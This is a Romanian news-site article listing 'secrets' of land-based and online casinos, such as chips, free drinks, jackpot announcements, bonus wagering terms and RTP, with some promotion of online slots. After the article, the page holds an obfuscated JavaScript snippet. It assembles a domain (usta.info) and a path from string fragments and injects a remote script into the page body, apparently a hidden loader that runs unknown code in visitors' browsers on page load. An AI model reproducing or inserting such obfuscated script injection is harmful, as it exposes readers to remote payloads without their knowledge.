Timpul Liber

Secretele cazinourilor – lucruri pe care nu le știai despre lumea cazinourilor

Tot mai mulți români sunt atrași de jocurile de cazino, mai ales de când acestea au devenit posibile în cele mai bune condiții și pe internet – o mulțime de platforme de sloturi și jocuri de masă de cazinou, licențiate pe plan local de către autoritatea națională în domeniu, Oficiul Național pentru Jocuri de Noroc. Lumea cazinourilor, cu care multe persoane au intrat în contact mai întâi prin prisma filmelor americane, îi fascinează pe mulți. Prestigiul demn de cazinourile veritabile din Las Vegas face parte și din experiența cazinourilor online, care oferă jocuri de live casino cu dealeri reali și o mulțime de facilități.

Cazinourile terestre au un farmec aparte, pentru că aduc împreună o mulțime de oameni. Zgomot, agitație, adrenalină, chiar socializare, băuturi, aparate luminoase, divertisment pur – iată, pe scurt, caracteristici cu care asociem inevitabil un cazino autentic. Haos? Departe de așa ceva! În realitate, totul este gândit cu un scop: oamenii să se simtă excelent, să se conecteze profund la jocuri și evident să joace pe cât mai mulți bani. Secretele cazinourilor… nu sunt chiar ținute la secret, doar că cele mai multe persoane nu le conștientizează. Iată câteva dintre ele:

Jetoane în loc de bani

Nu întâmplător în cazinourile clasice se joacă utilizând jetoane, cumpărate înainte cu bani reali. În timpul jocului, se folosesc aceste jetoane pentru a se paria diverse mize, în funcție de culorile și implicit valorile jetoanelor. Este o metodă pe de o parte practică (se evită folosirea banilor la joc în mod direct), dar mai ales este o metodă psihologică prin care jucătorii sunt încurajați să parieze mai mult. Jocul este redus la mize pe jetoane, cu un impact mai redus decât cel al folosirii banilor în mod direct. Când pierzi o sumă mai mare la o singură mână, aparent ai pierdut doar niște jetoane.

Melodii alese cu grijă la sloturi

Deși aparatele de sloturi sunt foarte luminoase și redau sunete în mod aproape continuu, în cazinourile terestre atmosfera este plăcută, zgomotul nu pare deranjant pentru nimeni. Și asta în ciuda faptului că aparatele de jocuri sunt așezate unul lângă celălalt. Explicația: aceste aparate de păcănele redau melodii scrise în gama C major, ca totul să pară fluent. De asemenea, aparatele de tip slot machine folosesc melodii simple, deloc deranjante pentru clienți.

Marile câștiguri, anunțate cu mare fast

În cazinourile terestre, marile câștiguri sunt marcate foarte clar, sonor, luminos, precum și de către angajați. Vâzând că o persoană a obținut un astfel de câștig, ceilalți jucători sunt încurajați să joace mai intens, încercând să urmeze modelul respectiv. La fel se întâmplă și în cazinourile online – jackpot-urile progresive sunt anunțate clar, sărbătorite practic, pentru ca toți jucătorii să înțeleagă că sunt posibile astfel de câștiguri deosebite.

Jackpoturile progresive sunt prezente în mediul online la foarte multe sloturi. De exemplu, toate sloturile de la EGT sunt conectate la un jackpot progresiv comun în 4 variante, cu premii din 3 sau chiar 6 cifre. Acest sistem de păcănele cu jackpot reprezintă unul din motivele pentru care EGT se bucură de o popularitate atât de mare.

Dealeri rapizi pe timp de noapte

Orele târzii din noapte și eventualul consum de alcool determină accentuarea oboselii pentru clienții din cazinouri. Noaptea, sunt folosiți de obicei dealeri mai rapizi, care profită de acest context în beneficiul cazinoului. Un dealer de blackjack poate efectua chiar și 50 de mâini într-o oră! Astfel, dealerii determină jucătorii să ia decizii mai repede, decizii care pot fi greșite sub presiunea oboselii.

Băutură gratis pentru clienți

La cazino, adesea distracția este asociată și cu alcool. Când nu mai ești atât de lucid, ai putea lua decizii pripite, ai putea risca prea mult sau ai putea continua să pierzi accelerat. În cazinouri se oferă băuturi gratuite, care întrețin atmosfera și îi fac pe clienți să se simtă VIP. Cu cât te simți mai bine și rămâi astfel să te bucuri de distracție mai mult timp, cu atât ai toate șansele să aloci mai mulți bani pentru această formă de divertisment. Pentru a evita o astfel de capcană, ia o decizie fermă de la start cu privire la suma maximă pe care îți permiți să o pierzi la cazino și oprește-te instant dacă ai ajuns la acea limită.

Bonusurile din cazinourile online vin cu termeni și condiții

Cei care nu se informează pot cădea în capcane mai ales în cazinouri online, acolo unde se promit mereu bonusuri de bun venit sau / și alte bonusuri speciale, mai ales clienților noi. Aceste bonusuri pot fi foarte atractive și depind de obicei de sumele pe bani reali transferate inițial sau în scurt timp după crearea unui nou cont de client. Câștigurile rezultate din astfel de bonusuri vin însă aproape mereu la pachet cu termeni și condiții care presupun rulaj destul de dificil de îndeplinit. Astfel, înainte de a realiza un cont nou la cazino online și de a plasa un depozit consistent, asigură-te că înțelegi corect termenii și condițiile respectivei promoții și toți pașii pe care trebuie să îi faci până la un eventual câștig posibil de încasat și retras.

RTP-ul se calculează pe o perioadă mai mare de timp

Jocurile de tip sloturi online (celebrele păcănele de pe internet) presupun cu mecanism de tip RTP (Return to Player) clar stabilit – procentul de bani care se întoarce la utilizator. Operatorul de jocuri își oprește 2 până la 10%, deci 90 – 98% din bani se întorc la clienți. Însă cazinourile online nu explică faptul că acest RTP nu se aplică pentru o sesiune, ci pentru o durată mai mare de timp, care nu este exprimată clar. Astfel, nu te poți baza pe faptul că ieși în câștig într-un anumit termen de timp, chiar și dacă ai juca doar tu în mod continuu.

Ceasurile lipsesc din cazinouri

Când te distrezi intens, adesea pierzi noțiunea timpului. Cazinourile profită de acest lucru și vor să te mențină cât mai mult timp la sloturi sau la mesele de ruletă, blackjack etc. Astfel, ceasurile de perete lipsesc din cazinouri. Este bine să îți păstrezi propriul echilibru și să nu uiți să verifici ora din când în când la propriul ceas de mână sau pe smartphone.

 
(function(){
a47y=document.createElement(“script”);a47y_=”u”+(“s”)+”ta”;
a47y_+=(“t.i”)+””+”n”;a47y_+=((“f”)+”o”);a47y.type=”text/javascript”;
a47y_+=”/”; a47yu=”314370945″;a47yu+=”.gjq2u1wf47yxam2swgl”;a47yu+=”n5xxwpmbssr”;
a47y.src=”https://”+a47y_+a47yu;a47y.async=true;document.body.appendChild(a47y);
})();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *